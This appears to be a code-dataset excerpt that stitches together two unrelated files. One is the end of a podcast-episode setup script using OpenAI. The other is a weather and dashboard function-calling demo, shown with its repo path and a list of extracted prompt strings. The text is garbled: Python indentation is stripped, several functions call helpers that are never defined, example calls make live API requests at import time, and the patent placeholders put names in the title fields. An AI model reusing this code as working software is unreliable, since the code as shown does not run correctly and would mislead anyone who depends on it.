episode.queue_up()
ActiveEpisodeDatabase().add_episode(episode.ID)
def clean_up_json(proposal_file=None):
"""Cleans up the JSON file from OpenAI to be valid JSON object for system"""
try:
with open(proposal_file, "r") as f:
data = f.readlines()
data = "".join(data)
data = re.sub(r'\s+', ' ', data)
pattern = r"\{(?:[^{}]|(.*))\}"
find_json = re.findall(pattern, data)
for json_obj in find_json:
try:
jdata = json.loads("{" + f"{json_obj}" + "}")
with open(proposal_file, "w") as f:
json.dump(jdata, f, indent=4)
except json.decoder.JSONDecodeError:
print(f"Invalid JSON Manually clean file: {proposal_file}")
except IOError as err:
print(err)
print("Error Occured while cleaning up JSON. Please check file manually.")
def openai_initial(episode_root=".", episode=None):
"""Generates the initial text ideas for an episode using OpenAI."""
episode_root = Path(episode_root).expanduser().resolve()
params = episode.__dict__
prompts = [
[
PROMPTS.proposed_episode.substitute(**params),
DEFAULTS.define_proposals,
],
[
PROMPTS.proposed_description.substitute(**params),
DEFAULTS.define_description,
],
[
PROMPTS.qotd.substitute(**params),
DEFAULTS.define_qotd,
],
[
PROMPTS.thumbnail_prompts.substitute(**params),
DEFAULTS.define_thumbnail_prompts,
],
]
for prompt, filepath in prompts:
oai.generate_text(prompt, episode_root / filepath)
clean_up_json(episode_root / DEFAULTS.define_proposals)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Initialize Episode Directory and Queue up"
)
parser.add_argument(
"episodes", type=str, nargs="+", help="push episode(s) to initialize"
)
args = parser.parse_args()
initialize_episodes(args.episodes)
"""
When I run Initialize Episode
I expect to provide it a hash value and look for the closest match, asking to confirm with a display showing details about it.
If I confirm, a directory will be generated with the correct name from a template
The meta data that was shown ( database values )
Get added to a prompt for openai to run a few generators for episode content.
The Define step is over and the status switches to research.
"""
| [] |
2024-01-10 | AnmolKiran/Sustainable-and-Trustworthy-Generative-AI | myweatherproject~myweatherapp~function.py | from openai import OpenAI
import json
from googlesearch import search
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lsa import LsaSummarizer
client = OpenAI()
def perform_search(query):
# Use the Google Search API or web scraping logic here
results = []
for j in search(query, num=5, stop=5, pause=2): # Fetching the top 5 search results
results.append({"title": "Result", "link": j, "snippet": "Description of the result."})
return results
def summarize_text(text):
parser = PlaintextParser.from_string(text, Tokenizer("english"))
summarizer = LsaSummarizer()
summary = summarizer(parser.document, 2) # 2 sentences in the summary
return ' '.join(str(sentence) for sentence in summary)
def search_function(query):
# Your search logic here
results = perform_search(query)
# Summarize each search result
for result in results:
result['summary'] = summarize_text(result['snippet'])
return json.dumps({"results": results})
def chat_function(message):
    # Step 1: build the conversation from the caller's message
    messages = [{"role": "user", "content": message}]
    # Step 2: make an API call to OpenAI.
    # Note: this example call sends a hard-coded conversation; the `messages` list built
    # above is not passed to the API here.
response = client.chat.completions.create(
model="gpt-4",
messages=[
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": "Tell me a joke."},
],
# tool_choice="auto", # auto is default, but we'll be explicit
)
# Step 3: Extract and return the assistant's reply
response_message = response.choices[0].message
return json.dumps({"response": response_message.content})
def trusted_sources_function(topic):
# Your trusted sources logic here
sources = get_trusted_sources(topic)
return json.dumps({"sources": sources})
def single_value_dashboard_function(metric):
# Your single value dashboard logic here
value = get_single_value_metric(metric)
return json.dumps({"value": value})
def chart_dashboard_function(chart_type, data):
# Your chart dashboard logic here
chart_data = generate_chart(chart_type, data)
return json.dumps({"chart_data": chart_data})
def news_dashboard_function(user_query, current_date, news_headlines):
# Generate a prompt using user query, current date, and news headlines
prompt = f"These are the latest news headlines regarding '{user_query}' on {current_date}. Give me a brief 1 paragraph summary for '{user_query}'.\nStart:\n"
for news_entry in news_headlines:
prompt += f"\n{news_entry['source']}\n{news_entry['headline']}\n{news_entry['timestamp']}\n"
# Call OpenAI API
response = client.chat.completions.create(
model="gpt-4",
messages=[
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": prompt},
],
)
# Extract and return the summary from the OpenAI response
response_message = response.choices[0].message
summary = response_message.content.strip()
return json.dumps({"summary": summary})
# Example usage (note: this runs at import time and makes a live OpenAI API call; in a
# real app you would likely guard it with `if __name__ == "__main__":`):
user_query = "steel price forecast"
current_date = "11th November 2023"
news_headlines = [
{"source": "CNBC", "headline": "Goldman Sachs sees 'clear deficit' of iron ore", "timestamp": "Yesterday"},
# Add more news entries as needed
]
result = news_dashboard_function(user_query, current_date, news_headlines)
print(result)
def patents_search_function(query):
# Your patents search logic here (replace with actual implementation)
patents_data = [
{
"title": "舜平 山崎 株式会社半導体エネルギー研究所",
"priority": "2003-06-16",
"filed": "2023-08-10",
"granted": "2023-09-29",
"published": "2023-09-29",
"description": "An object of the present invention is to form an auxiliary electrode that can prevent a luminance gradient caused by a potential drop of a counter electrode from becoming visible even as the definition of a light emitting device progresses...",
},
{
"title": "シャシュア,アムノン モービルアイ ビジョン テクノロジーズ リミテッド",
"priority": "2018-03-20",
"filed": "2023-07-11",
"granted": "2023-10-23",
"published": "2023-10-23",
"description": "In the processor circuit, obtaining a planned driving behavior to achieve a navigation goal of the host vehicle; receiving sensor data from a sensor device representative of the environment surrounding the host vehicle; identifying a target vehicle moving within the environment...",
},
# Add more patent data as needed
]
    # Build a prompt asking the model to summarize the patents related to the user query.
    # Note: as written, this prompt text is returned directly as the "summary" without being
    # sent to the model; see the sketch after this function for one way to do that.
    summary_paragraph = f"These are the latest patents related to '{query}'. Summarize these patents in one paragraph and relate them to '{query}'.\n\n"
for patent in patents_data:
summary_paragraph += f"{patent['title']} ({patent['priority']}): {patent['description']}\n\n"
# Return the summary as a JSON string
return json.dumps({"summary": summary_paragraph})
# Example dummy function hard coded to return the same weather
# In production, this could be your backend API or an external API
def get_current_weather(location, unit="fahrenheit"):
"""Get the current weather in a given location"""
if "tokyo" in location.lower():
return json.dumps({"location": "Tokyo", "temperature": "10", "unit": "celsius"})
elif "san francisco" in location.lower():
return json.dumps({"location": "San Francisco", "temperature": "72", "unit": "fahrenheit"})
elif "paris" in location.lower():
return json.dumps({"location": "Paris", "temperature": "22", "unit": "celsius"})
else:
return json.dumps({"location": location, "temperature": "unknown"})
def run_conversation():
# Step 1: send the conversation and available functions to the model
messages = [{"role": "user", "content": "What's the weather like in San Francisco, Tokyo, and Paris?"}]
tools = [
{
"type": "function",
"function": {
"name": "get_current_weather",
"description": "Get the current weather in a given location",
"parameters": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "The city and state, e.g. San Francisco, CA",
},
"unit": {"type": "string", "enum": ["celsius", "fahrenheit"]},
},
"required": ["location"],
},
},
}
]
response = client.chat.completions.create(
model="gpt-4",
messages=messages,
tools=tools,
# tool_choice="auto", # auto is default, but we'll be explicit
)
response_message = response.choices[0].message
tool_calls = response_message.tool_calls
# Step 2: check if the model wanted to call a function
if tool_calls:
# Step 3: call the function
# Note: the JSON response may not always be valid; be sure to handle errors
available_functions = {
"chat_function": chat_function,
"search_function": search_function,
"trusted_sources_function": trusted_sources_function,
"single_value_dashboard_function": single_value_dashboard_function,
"chart_dashboard_function": chart_dashboard_function,
"news_dashboard_function": news_dashboard_function,
"patents_search_function": patents_search_function,
"get_current_weather": get_current_weather,
        }  # several functions are registered here, but only get_current_weather is exposed to the model via `tools` above
messages.append(response_message) # extend conversation with assistant's reply
# Step 4: send the info for each function call and function response to the model
for tool_call in tool_calls:
function_name = tool_call.function.name
function_to_call = available_functions[function_name]
function_args = json.loads(tool_call.function.arguments)
            # These keyword arguments match get_current_weather, the only function the
            # model can actually request through the `tools` schema defined above.
            function_response = function_to_call(
                location=function_args.get("location"),
                unit=function_args.get("unit"),
            )
messages.append(
{
"tool_call_id": tool_call.id,
"role": "tool",
"name": function_name,
"content": function_response,
}
) # extend conversation with function response
second_response = client.chat.completions.create(
model="gpt-4",
messages=messages,
) # get a new response from the model where it can see the function response
return second_response.json()
print(run_conversation()) | [
"These are the latest news headlines regarding 'PLACEHOLDER' on PLACEHOLDER. Give me a brief 1 paragraph summary for 'PLACEHOLDER'.\nStart:\n",
"Tell me a joke.",
"What's the weather like in San Francisco, Tokyo, and Paris?",
"You are a helpful assistant.",
"\nPLACEHOLDER\nPLACEHOLDER\nPLACEHOLDER\n"
] |